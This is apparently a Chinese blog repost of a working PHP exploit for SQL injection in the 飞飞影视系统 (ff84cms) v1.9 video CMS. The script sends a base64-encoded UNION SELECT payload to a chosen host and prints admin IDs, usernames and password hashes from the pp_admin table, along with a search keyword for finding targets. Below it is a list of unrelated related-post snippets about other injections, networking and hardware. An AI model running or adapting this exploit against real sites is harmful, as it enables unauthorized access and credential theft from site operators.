文章作者:honglousy

昨天整的 论坛旁站上的程序,发现用的人还真不少,

简单的写了个exp。无聊之作...

/**

*  飞飞影视管理系统 SQL injection

*  飞飞影视系统PHP版 v1.9 injection exploit

*  by:www.08sec.com fans

*     keyword "Powered bywww.ff84.com"

*/

error_reporting(E_ERROR);

set_time_limit(0);

if ($argc<3) {

print_r('

------------------------------------------------------

Usage: php '.$argv[0].' host path

host: target server (ip/hostname),without"http://"

path: path to ff84cms

Example:

php '.$argv[0].' localhost /

-------------------------------------------------------

');

die;

}

$host=$argv[1];

$path=$argv[2];

$html='';

$cookie="";

$agent=" User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1";

$content ="";

$data = "POST /?s=vod-read-id-1".base64_decode('JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==')."html HTTP/1.1\r\n";

$data .= "Host: ".$host."\r\n";

//$data .="Cookie: ".$cookie."\r\n";

$data .= "User-Agent: ".$agent. "\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";

$data .= "Accept-Encoding: gzip,deflate\r\n";

$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";

$data .= "Connection: keep-alive\r\n";

$data .= "Content-Type: application/x-www-form-urlencoded\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

Sendpack($data);

if (!eregi("Tpl",$html)){

// echo $packet."\r\n";

// echo $html."\r\n";

die("Exploit failed...");

}else{

$pattern="/@(.*)@/i";

preg_match($pattern,$html,$pg);

echo "$pg[1]\r\n\r\n";

echo "\r\nExploit succeeded...\r\n";

}

Function sendpack ($packet)

{

global $host, $html;

$ock=fsockopen(gethostbyname($host),'80');

if (!$ock) {

echo 'No response from '.$host; die;

}

fputs($ock,$packet);

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

fclose($ock);

}

飞飞php影视系统漏洞,飞飞影视系统PHP版 v1.9 injection exploit漏洞预警 -电脑资料...相关推荐

  1. 易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...

    刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序, 找到get_client_ip()函数 ...

  2. 服务器系统刻录,Windows XP操作系统中光盘刻录实战服务器教程 -电脑资料

    window 早就知道Win XP增加了对刻录机的支持,也就是无需任何第三方软件直接在WinXP中就能完成刻录的工作,但是一直没有机会测试, 正确的完成硬件的安装,启动WinXP后并没有出现什么找到新 ...

  3. 虚拟机服务器 资料安全,绝密:三步教你轻松窃取VMware虚拟机及其数据漏洞预警 -电脑资料...

    是否记得曾经虚拟化过的邮件服务器或者薪酬支付系统?如果拥有访问虚拟化工作环境管理员权限,就可以轻松地进入该虚拟化工作环境,并且窃取所有的数据,而又不会留下任何痕迹, 虚拟化技术可以提供很多物理服务器无 ...

  4. php sql漏洞修复,PHPNet = 1.8 (ler.php) SQL注射及修复漏洞预警 -电脑资料

    标题: PHPNet <= 1.8 (ler.php) SQL Injection 作者 WhiteCollarGroup 开发者: http://www.phpnet.com.br/ 下载地址 ...

  5. 飞飞影视php 漏洞,飞飞影视SQL injection exploit[转]

    /** * 飞飞影视管理系统 SQL injection * 飞飞影视系统PHP版 v1.9 injection exploit * by:www.08sec.com fans * keyword & ...

  6. 0day安全:软件漏洞分析技术(第2版)

    0day安全:软件漏洞分析技术(第2版) 基本信息 作者:王清   张东辉   周浩   王继刚   赵双 丛书名:安全技术大系 出版社:电子工业出版社 ISBN:9787121133961 上架时间 ...

  7. 飞飞php影视系统源码怎么改,飞飞cms影视系统安装说明 飞飞影视系统建站流程...

    1. 将文件夹下所有的文件上传至您的网站空间 2. 如果您的主机为 window 操作系统,请将以下文件夹的IIS用户加上写入权限 3. 如果您的主机为 linux 操作系统,请设置如下文件夹权限为 ...

  8. 飞飞cms添加广告html,飞飞cms影视系统 安装说明飞飞影视系统 建站流程

    飞飞影视系统 安装说明 --------------------------------------- 1. 将文件夹下所有的文件上传至您的网站空间 2.  如果您的主机为 window 操作系统,请 ...

  9. 飞飞cms添加广告html,飞飞影视cms-飞飞cms免费影视站程序

    飞飞影视导航系统又名飞飞CMS,程序100%完全开源,无任何加密代码.无广告.无后门.飞飞影视导航系统采用PHP+Mysql技术开发,可以在windows和Linux系统平台上运行.飞飞影视导航系统是 ...

最新文章

  1. 这是人家大一新生开发的工具!网友:我好菜
  2. 怎么检查python是否安装成功-如何在Docker中检查是否安装了python包?
  3. ITK:从灰度图像计算直方图
  4. 动态规划 53:Maximum Subarray,152:Maximum Subarray,266. Palindrome Permutation 回文全排列...
  5. windows版本的clion软件除了使用wsl配置Ubuntu子系统外,还可以使用MinGW-w64来配置gcc和g++
  6. 在计算机网络中为了保证正确传输,计算机网络试卷B
  7. pic单片机选型手册_STM32F103单片机RTC及其晶振相关的官方资料整理
  8. (转)json+flexgrid+jbox组合运用页面刷新jsp
  9. oracle禁止访问监听,关于ORACLE数据库监听自动停止解决一例
  10. PVE系列教程(七)、安装iKuai软路由
  11. chrome浏览器无法打开网页怎么办
  12. pytorch-psenet实现 并训练自己的数据集
  13. 前端获取微信头像 base64 数据的踩坑实践
  14. 全国计算机二级考试web程序,2018年全国计算机二级web程序考试考什么内容
  15. 12、Kanzi插件——创建Kanzi Engine插件的方法
  16. TMS320F28034PNT 德州TI 具有 60MHz 频率、128KB 闪存的 C2000™ 32 位 MCU
  17. 第二季:9.生产环境服务器变慢,诊断思路和性能评估谈谈?【Java面试题】
  18. 编码 unicode 及其在 javascript 中的使用
  19. 【优化系列】汇编优化技术(九):WebAssembly(wasm)平台SIMD优化
  20. xd卡数据丢失原因和三种数据恢复方法介绍

热门文章

  1. 新华三杯复赛实验-虚拟局域网与IPv4 IGP路由部署解析
  2. 设置网络唤醒电脑(WAKE ON LAN,WOL)
  3. 程序员如何积累编程技术或编程经验?
  4. 【论文Word排版】使用多级列表设置论文序号
  5. PD充电加数据OTG方案
  6. 单片机光敏电阻控制蜂鸣器_光敏电阻控制蜂鸣器的开关,当值大于200时关,反之则开。...
  7. 技术文档写作的职业探讨
  8. Linux Deepin 新增英国肯特大学镜像服务
  9. 基于Golang的个人博客-goblog
  10. 可编辑的el-table表格